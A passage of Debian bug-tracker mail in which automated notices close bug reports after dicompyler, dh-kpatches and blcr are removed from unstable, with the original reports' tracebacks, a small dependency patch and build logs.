RIPEMD-160 passedsignature key validation passedsignature and verification passedchecking invalid signature make[1]: *** [debian/rules:54: override_dh_auto_test-arch] Bus error make[1]: Leaving directory '/<>' make: *** [debian/rules:72: binary] Error 2
Bug#985891: marked as done (dicompyler doesn't start)
Your message dated Sat, 13 Aug 2022 07:04:06 + with message-id and subject line Bug#1017059: Removed package(s) from unstable has caused the Debian Bug report #985891, regarding dicompyler doesn't start to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 985891: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=985891 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: dicompyler Version: 0.4.2.0+git20200106.2643e0e-1 Severity: important X-Debbugs-Cc: desmont...@netcourrier.com Dear Maintainer, The dicompyler installation ends successfully but the application does not start. It seems that matplotlib dependency is not satisfied. In a terminal: desmonts@debian:~$ dicompyler Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 568, in _build_master ws.require(__requires__) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 886, in require needed = self.resolve(parse_requirements(requirements)) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 777, in resolve raise VersionConflict(dist, req).with_context(dependent_req) pkg_resources.ContextualVersionConflict: (matplotlib 3.3.4 (/usr/lib/python3/dist-packages), Requirement.parse('matplotlib<2.2,>=1.3.0'), {'dicompyler'}) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/bin/dicompyler", line 6, in from pkg_resources import load_entry_point File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 3243, in def _initialize_master_working_set(): File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 3226, in _call_aside f(*args, **kwargs) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 3255, in _initialize_master_working_set working_set = WorkingSet._build_master() File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 570, in _build_master return cls._build_from_requirements(__requires__) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 583, in _build_from_requirements dists = ws.resolve(reqs, Environment()) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 772, in resolve raise DistributionNotFound(req, requirers) pkg_resources.DistributionNotFound: The 'matplotlib<2.2,>=1.3.0' distribution was not found and is required by dicompyler -- System Information: Debian Release: bullseye/sid APT prefers testing APT policy: (500, 'testing') Architecture: amd64 (x86_64) Kernel: Linux 5.10.0-4-amd64 (SMP w/4 CPU threads) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages dicompyler depends on: ii python3 3.9.2-2 ii python3-dicompylercore 0.5.5-2 ii python3-matplotlib 3.3.4-1 ii python3-numpy 1:1.19.5-1 ii python3-pil 8.1.2-1 ii python3-pydicom 2.0.0-1 ii python3-tornado 6.1.0-1+b1 ii python3-wxgtk4.04.0.7+dfsg-10 dicompyler recommends no packages. dicompyler suggests no packages. --- End Message --- --- Begin Message --- Version: 0.4.2.0+git20200106.2643e0e-1+rm Dear submitter, as the package dicompyler has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1017059 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#999276: marked as done (dh-kpatches: missing required debian/rules targets build-arch and/or build-indep)
Your message dated Sat, 13 Aug 2022 06:59:39 + with message-id and subject line Bug#575848: Removed package(s) from unstable has caused the Debian Bug report #999276, regarding dh-kpatches: missing required debian/rules targets build-arch and/or build-indep to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 999276: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=999276 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: dh-kpatches Version: 0.99.36+nmu4 Severity: important Justification: Debian Policy section 4.9 Tags: bookworm sid User: debian...@lists.debian.org Usertags: missing-build-arch-indep Dear maintainer, Your package does not include build-arch and/or build-indep targets in debian/rules. This is required by Debian Policy section 4.9, since 2012. https://www.debian.org/doc/debian-policy/ch-source.html#main-building-script-debian-rules Please note that this is also a sign that the packaging of this software could benefit from a refresh. For example, packages using 'dh' cannot be affected by this issue. This mass bug filing was discussed on debian-devel@ in https://lists.debian.org/debian-devel/2021/11/msg00052.html . The severity of this bug will be changed to 'serious' after a month. Best, Lucas --- End Message --- --- Begin Message --- Version: 0.99.36+nmu4+rm Dear submitter, as the package dh-kpatches has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/575848 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#876892: marked as done (dh-kpatches FTBFS with gtk-doc-tools 1.26: docbook-2-html: unknown style `gtk')
Your message dated Sat, 13 Aug 2022 06:59:39 + with message-id and subject line Bug#575848: Removed package(s) from unstable has caused the Debian Bug report #876892, regarding dh-kpatches FTBFS with gtk-doc-tools 1.26: docbook-2-html: unknown style `gtk' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 876892: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876892 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: dh-kpatches Version: 0.99.31 Severity: serious Tags: buster sid https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/dh-kpatches.html ... docbook-2-html --dssslproc openjade -s gtk -O -Vnochunks -O -Vonechunk dh-kpatches.docbook.sgml >dh-kpatches.html openjade:W: feature "online" not supported openjade:W: feature "query" only partially supported ERROR: docbook-2-html: unknown style `gtk' Makefile:51: recipe for target 'dh-kpatches.html' failed make[2]: *** [dh-kpatches.html] Error 1 --- End Message --- --- Begin Message --- Version: 0.99.36+nmu4+rm Dear submitter, as the package dh-kpatches has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/575848 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#809599: marked as done (dh-kpatches: Please change dependency from obsolete openjade1.3 to openjade)
Your message dated Sat, 13 Aug 2022 06:59:39 + with message-id and subject line Bug#575848: Removed package(s) from unstable has caused the Debian Bug report #809599, regarding dh-kpatches: Please change dependency from obsolete openjade1.3 to openjade to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 809599: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=809599 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: dh-kpatches Severity: normal Tags: patch The package openjade1.3 is obsolete and will be removed from Debian. dh-kpatches build depends on it. Please change the dependency from openjade1.3 to openjade. A patch with all the required changes is attached. Thanks. diff -Nru dh-kpatches-0.99.36+nmu1/debian/changelog dh-kpatches-0.99.36+nmu2/debian/changelog --- dh-kpatches-0.99.36+nmu1/debian/changelog 2011-08-20 09:26:06.0 -0400 +++ dh-kpatches-0.99.36+nmu2/debian/changelog 2015-12-31 13:37:24.0 -0500 @@ -1,3 +1,10 @@ +dh-kpatches (0.99.36+nmu2) UNRELEASED; urgency=medium + + * Non-maintainer upload. + * Changed build dependency from openjade1.3 to openjade. + + -- Neil Roeth Thu, 31 Dec 2015 13:36:49 -0500 + dh-kpatches (0.99.36+nmu1) unstable; urgency=low * Non-maintainer upload. diff -Nru dh-kpatches-0.99.36+nmu1/debian/control dh-kpatches-0.99.36+nmu2/debian/control --- dh-kpatches-0.99.36+nmu1/debian/control 2011-08-20 09:25:11.0 -0400 +++ dh-kpatches-0.99.36+nmu2/debian/control 2015-12-31 13:42:40.0 -0500 @@ -2,7 +2,7 @@ Section: devel Priority: extra Maintainer: Yann Dirson -Build-Depends-Indep: debhelper (>> 4), docbook-utils, docbook, debiandoc-sgml, sgml2x (>= 1.0.0), openjade1.3, gtk-doc-tools, nowebm, dh-buildinfo +Build-Depends-Indep: debhelper (>> 4), docbook-utils, docbook, debiandoc-sgml, sgml2x (>= 1.0.0), openjade, gtk-doc-tools, nowebm, dh-buildinfo Standards-Version: 3.5.10 Package: dh-kpatches diff -Nru dh-kpatches-0.99.36+nmu1/doc/Makefile dh-kpatches-0.99.36+nmu2/doc/Makefile --- dh-kpatches-0.99.36+nmu1/doc/Makefile 2011-08-20 09:24:59.0 -0400 +++ dh-kpatches-0.99.36+nmu2/doc/Makefile 2015-12-31 14:28:25.0 -0500 @@ -48,10 +48,10 @@ docbook2man $< %.html: %.docbook.sgml - docbook-2-html --dssslproc openjade1.3 -s gtk -O -Vnochunks -O -Vonechunk $< >$@ + docbook-2-html --dssslproc openjade -s gtk -O -Vnochunks -O -Vonechunk $< >$@ rmdir -p $*-html %.pdf: %.docbook.sgml - docbook-2-pdf --dssslproc openjade1.3 $< + docbook-2-pdf --dssslproc openjade $< .DELETE_ON_ERROR: -- System Information: Debian Release: stretch/sid APT prefers unstable APT policy: (990, 'unstable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.14-2-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) -- Neil Roeth --- End Message --- --- Begin Message --- Version: 0.99.36+nmu4+rm Dear submitter, as the package dh-kpatches has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/575848 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#359095: marked as done (dh-kpatches: bugs in apply perl script)
Your message dated Sat, 13 Aug 2022 06:59:39 + with message-id and subject line Bug#575848: Removed package(s) from unstable has caused the Debian Bug report #359095, regarding dh-kpatches: bugs in apply perl script to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 359095: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=359095 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: dh-kpatches Version: 0.100.1 Severity: grave Tags: experimental Justification: renders package unusable I built a kernel-patch package for the hard disk queue freezing patch that is used with the IBM ThinkPad HDAPS support code. It was built with dh-kpatches 0.100.1, and I was told by a user that this package does not work. The following errors are made in the apply perl script: a) line 63 if (defined $DEBPATCHFILES[$IDX] ... is the wrong test since an empty string is defined in perl. It should be if( not ($DEBPATCHFILES[$IDX] eq "") b) line 153 printf 'Disk queue freezing support (queuefreeze)" has inconsistent quotation marks -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages dh-kpatches depends on: ii debhelper 5.0.25 helper programs for debian/rules ii perl 5.8.8-3Larry Wall's Practical Extraction dh-kpatches recommends no packages. -- no debconf information --- End Message --- --- Begin Message --- Version: 0.99.36+nmu4+rm Dear submitter, as the package dh-kpatches has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/575848 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#965438: marked as done (blcr: Removal of obsolete debhelper compat 5 and 6 in bookworm)
Your message dated Sat, 13 Aug 2022 06:57:47 + with message-id and subject line Bug#876908: Removed package(s) from unstable has caused the Debian Bug report #965438, regarding blcr: Removal of obsolete debhelper compat 5 and 6 in bookworm to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 965438: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=965438 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: blcr Version: 0.8.5-2.3 Severity: normal Usertags: compat-5-6-removal Hi, The package blcr uses debhelper with a compat level of 5 or 6, which is deprecated and scheduled for removal[1]. Please bump the debhelper compat at your earliest convenience /outside the freeze/! * Compat 13 is recommended (supported in stable-backports) * Compat 7 is the bare minimum PLEASE KEEP IN MIND THAT the release team *DOES NOT* accept uploads with compat bumps during the freeze. If there is any risk that the fix for this bug might not migrate to testing before 2021-01-01[3] then please postpone the fix until after the freeze. At the time of filing this bug, compat 5 and 6 are expected to be removed "some time during the development cycle of bookworm". Thanks, ~Niels [1] https://lists.debian.org/debian-devel/2020/07/msg00065.html [2] https://release.debian.org/bullseye/FAQ.html [3] The choice of 2021-01-01 as a "deadline" is set before the actual freeze deadline to provide a safe cut off point for most people. Mind you, it is still your responsibility to ensure that the upload makes it into testing even if you upload before that date. --- End Message --- --- Begin Message --- Version: 0.8.5-2.3+rm Dear submitter, as the package blcr has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/876908 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#877238: marked as done (blcr: FTBFS: /bin/sh: 1: cd: can't cd to debian/blcr-source/usr/src/modules/blcr)
Your message dated Sat, 13 Aug 2022 06:57:47 + with message-id and subject line Bug#876908: Removed package(s) from unstable has caused the Debian Bug report #877238, regarding blcr: FTBFS: /bin/sh: 1: cd: can't cd to debian/blcr-source/usr/src/modules/blcr to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 877238: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877238 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: blcr Version: 0.8.6~b3-1 Severity: serious Justification: fails to build from source (but built successfully in the past) Hi, blcr/experimental FTBFS in a current sid+experimental environment: make[2]: Nothing to be done for 'install-data-am'. make[2]: Leaving directory '/build/blcr-0.8.6~b3/build/libcr32/libcr' make[1]: Leaving directory '/build/blcr-0.8.6~b3/build/libcr32/libcr' #not sure if this is the right place/way to fix this? mv /build/blcr-0.8.6~b3/debian/libcr0/usr/lib64 /build/blcr-0.8.6~b3/debian/libcr0/usr/lib # lib32 please (#555475) mv /build/blcr-0.8.6~b3/debian/lib32cr0/usr/lib /build/blcr-0.8.6~b3/debian/lib32cr0/usr/lib32 # No lib32cr-dev package, so we don't need these rm /build/blcr-0.8.6~b3/debian/lib32cr0/usr/lib32/*.la /build/blcr-0.8.6~b3/debian/lib32cr0/usr/lib32/*.so mv /build/blcr-0.8.6~b3/debian/libcr0/usr/lib/*.la /build/blcr-0.8.6~b3/debian/libcr-dev/usr/lib/ mv /build/blcr-0.8.6~b3/debian/libcr0/usr/lib/*.so /build/blcr-0.8.6~b3/debian/libcr-dev/usr/lib/ # fix the libdir in the -dev package too sed -i -e 's/lib64/lib/g' /build/blcr-0.8.6~b3/debian/libcr-dev/usr/lib/*.la # fix for policy 3.9.1 change of *.la files in -dev packages sed -i -e "s/^dependency_libs.*/dependency_libs=''/" /build/blcr-0.8.6~b3/debian/libcr-dev/usr/lib/*.la chrpath -d /build/blcr-0.8.6~b3/debian/blcr-util/usr/bin/cr_checkpoint /build/blcr-0.8.6~b3/debian/blcr-util/usr/bin/cr_restart chrpath -d -k /build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/* `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/RUN_ME' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/bug2003' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/clobber' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/cr_omit' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/cr_run' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/cr_targ' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/cr_targ2' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/dlopen' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/reloc_all' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/reloc_dir' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/reloc_exe' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/reloc_fifo' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/reloc_file' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/run_on' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/save_all' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/save_exe' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/save_priv' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/save_share' probably isn't an ELF file. elf_open: Exec format error `/build/blcr-0.8.6~b3/debian/blcr-testsuite/usr/lib/blcr-testsuite/shellinit' probably isn't an ELF file. elf_open: Exec format error debian/rules:117: recipe for target 'install' failed make: [install] Error 1
Bug#876908: marked as done (RM: blcr -- RoQA; unmaintained; broken for several releases)
Your message dated Sat, 13 Aug 2022 06:57:42 + with message-id and subject line Bug#876908: Removed package(s) from unstable has caused the Debian Bug report #876908, regarding RM: blcr -- RoQA; unmaintained; broken for several releases to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 876908: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876908 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: blcr Version: 0.8.5-2.1 Severity: serious Tags: buster sid As far as I can see: 1. blcr is dead upstream since 2013. 2. blcr requires both userspace and kernel parts. 3. The -dkms package is removed in unstable. 4. The beta version in experimental has an RC bug against the -dkms package that the module does not build with the jessie (sic) kernel. mpich is linked with the userspace library, but does that make any sense without the kernel part? --- End Message --- --- Begin Message --- We believe that the bug you reported is now fixed; the following package(s) have been removed from unstable: blcr | 0.8.5-2.3 | source blcr-testsuite | 0.8.5-2.3+b1 | amd64, armel, armhf, i386 blcr-util | 0.8.5-2.3+b1 | amd64, armel, armhf, i386 lib32cr0 | 0.8.5-2.3+b1 | amd64 libcr-dbg | 0.8.5-2.3+b1 | amd64, armel, armhf, i386 libcr-dev | 0.8.5-2.3+b1 | amd64, armel, armhf, i386 libcr0 | 0.8.5-2.3+b1 | amd64, armel, armhf, i386 --- Reason --- RoQA; unmaintained; broken for several releases -- Note that the package(s) have simply been removed from the tag database and may (or may not) still be in the pool; this is not a bug. The package(s) will be physically removed automatically when no suite references them (and in the case of source, when no binary references it). Please also remember that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. Packages are usually not removed from testing by hand. Testing tracks unstable and will automatically remove packages which were removed from unstable when removing them from testing causes no dependency problems. The release team can force a removal from testing if it is really needed, please contact them if this should be the case. We try to close bugs which have been reported against this package automatically. But please check all old bugs, if they were closed correctly or should have been re-assigned to another package. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 876...@bugs.debian.org. The full log for this bug can be viewed at https://bugs.debian.org/876908 This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#776920: marked as done (blcr-dkms: fails to build kernel module for 3.16.0-4-amd64)
Your message dated Sat, 13 Aug 2022 06:57:47 + with message-id and subject line Bug#876908: Removed package(s) from unstable has caused the Debian Bug report #776920, regarding blcr-dkms: fails to build kernel module for 3.16.0-4-amd64 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 776920: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776920 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: blcr-dkms Version: 0.8.6~b3-1 Severity: serious User: debian...@lists.debian.org Usertags: piuparts Hi, during a test with piuparts I noticed your package failed to build a kernel module for 3.16.0-4-amd64: Setting up blcr-dkms (0.8.6~b3-1) ... Creating symlink /var/lib/dkms/blcr/0.8.6~b3/source -> /usr/src/blcr-0.8.6~b3 DKMS: add completed. Kernel preparation unnecessary for this kernel. Skipping... Building module: cleaning build area make KERNELRELEASE=3.16.0-4-amd64 -C /lib/modules/3.16.0-4-amd64/build M=/var/lib/dkms/blcr/0.8.6~b3/build.(bad exit status: 2) Error! Bad return status for module build on kernel: 3.16.0-4-amd64 (x86_64) Consult /var/lib/dkms/blcr/0.8.6~b3/build/make.log for more information. make.log ends with checking for Linux kernel symbol table... failed configure: error: Failed to locate kernel symbol table. Try using --with-system-map or --with-vmlinux. /var/lib/dkms/blcr/0.8.6~b3/build/Kbuild:7: recipe for target '/var/lib/dkms/blcr/0.8.6~b3/build/config-stamp' failed make[3]: *** [/var/lib/dkms/blcr/0.8.6~b3/build/config-stamp] Error 1 /usr/src/linux-headers-3.16.0-4-common/Makefile:1350: recipe for target '_module_/var/lib/dkms/blcr/0.8.6~b3/build' failed make[2]: *** [_module_/var/lib/dkms/blcr/0.8.6~b3/build] Error 2 Makefile:181: recipe for target 'sub-make' failed make[1]: *** [sub-make] Error 2 Makefile:8: recipe for target 'all' failed make: *** [all] Error 2 Andreas DKMS make.log for blcr-0.8.6~b3 for kernel 3.16.0-4-amd64 (x86_64) Tue Feb 3 10:32:40 UTC 2015 make: Entering directory '/usr/src/linux-headers-3.16.0-4-amd64' make[1]: Entering directory `/usr/src/linux-headers-3.16.0-4-amd64' /var/lib/dkms/blcr/0.8.6~b3/build/Kbuild:19: /var/lib/dkms/blcr/0.8.6~b3/build/module_files: No such file or directory cd /var/lib/dkms/blcr/0.8.6~b3/build && env -i PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/lib/dkms ./configure --disable-maintainer-mode --with-linux=3.16.0-4-amd64 --with-installed-libcr --with-installed-util --with-components=modules --prefix=/usr && touch /var/lib/dkms/blcr/0.8.6~b3/build/config-stamp checking for a BSD-compatible install... /usr/bin/install -c checking whether build environment is sane... yes checking for a thread-safe mkdir -p... /bin/mkdir -p checking for gawk... no checking for mawk... mawk checking whether make sets $(MAKE)... yes checking whether make supports nested variables... yes checking whether to enable maintainer-specific portions of Makefiles... no checking for pwd... /bin/pwd checking build system type... x86_64-unknown-linux-gnu checking host system type... x86_64-unknown-linux-gnu checking for perl5... no checking for perl... /usr/bin/perl checking for gmake... no checking for make... /usr/bin/make checking if /usr/bin/make is GNU make... yes (4.0) checking for ranlib... ranlib checking whether ln -s works... yes checking for style of include used by /usr/bin/make... GNU checking for gcc... gcc checking whether the C compiler works... yes checking for C compiler default output file name... a.out checking for suffix of executables... checking whether we are cross compiling... no checking for suffix of object files... o checking whether we are using the GNU C compiler... yes checking whether gcc accepts -g... yes checking for gcc option to accept ISO C89... none needed checking whether gcc understands -c and -o together... yes checking dependency style of gcc... gcc3 checking for g++... g++ checking whether we are using the GNU C++ compiler... yes checking whether g++ accepts -g... yes checking dependency style of g++... gcc3 checking how to run the C++ preprocessor... g++ -E checking how to run the C preprocessor... gcc -E checking for grep that handles long lines and -e... /bin/grep checking for egrep... /bin/grep -E checking for ANSI C header files... yes checking for sys/types.h... yes checking for sys/stat.h... yes checking for stdlib.h... yes checking for string.h... yes checking for memory.h... yes checking for strings.h... yes checking for inttypes.h... yes checking for stdint.h... yes checking for unistd.h... yes checking size of void *... 8 checking
Bug#944626: marked as done (diet-ng FTBFS on armhf: gdc: error: unrecognized command line option ‘-main’; did you mean ‘-Wmain’?)
Your message dated Sat, 13 Aug 2022 06:18:51 + with message-id and subject line Bug#944626: fixed in diet-ng 1.8.1-2 has caused the Debian Bug report #944626, regarding diet-ng FTBFS on armhf: gdc: error: unrecognized command line option ‘-main’; did you mean ‘-Wmain’? to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 944626: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=944626 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: diet-ng Version: 1.5.0-1 Severity: serious Tags: ftbfs Justification: ftbfs -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Dear maintainer, You package was rebuild due the libphobos2-ldc-shared87 transition, but it failed (some time ago) on armhf. https://buildd.debian.org/status/package.php?p=diet-ng Tail of log for diet-ng on armhf: d21: warning: command line option ‘-Wformat=1’ is valid for C/C++/ObjC/ObjC++ but not for D d21: warning: ‘-Werror=’ argument ‘-Werror=format-security’ is not valid for D [16/18] gdc -Itest_diet@exe -I. -I.. -I../source/ -fdiagnostics-color=always -g -O2 -fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat -Werror=format-security -funittest -MD -MQ 'test_diet@exe/source_diet_parser.d.o' -MF 'test_diet@exe/source_diet_parser.d.o.deps' -o 'test_diet@exe/source_diet_parser.d.o' -c ../source/diet/parser.d d21: warning: command line option ‘-Wformat=1’ is valid for C/C++/ObjC/ObjC++ but not for D d21: warning: ‘-Werror=’ argument ‘-Werror=format-security’ is not valid for D [17/18] gdc -Itest_diet@exe -I. -I.. -I../source/ -fdiagnostics-color=always -g -O2 -fdebug-prefix-map=/<>=. 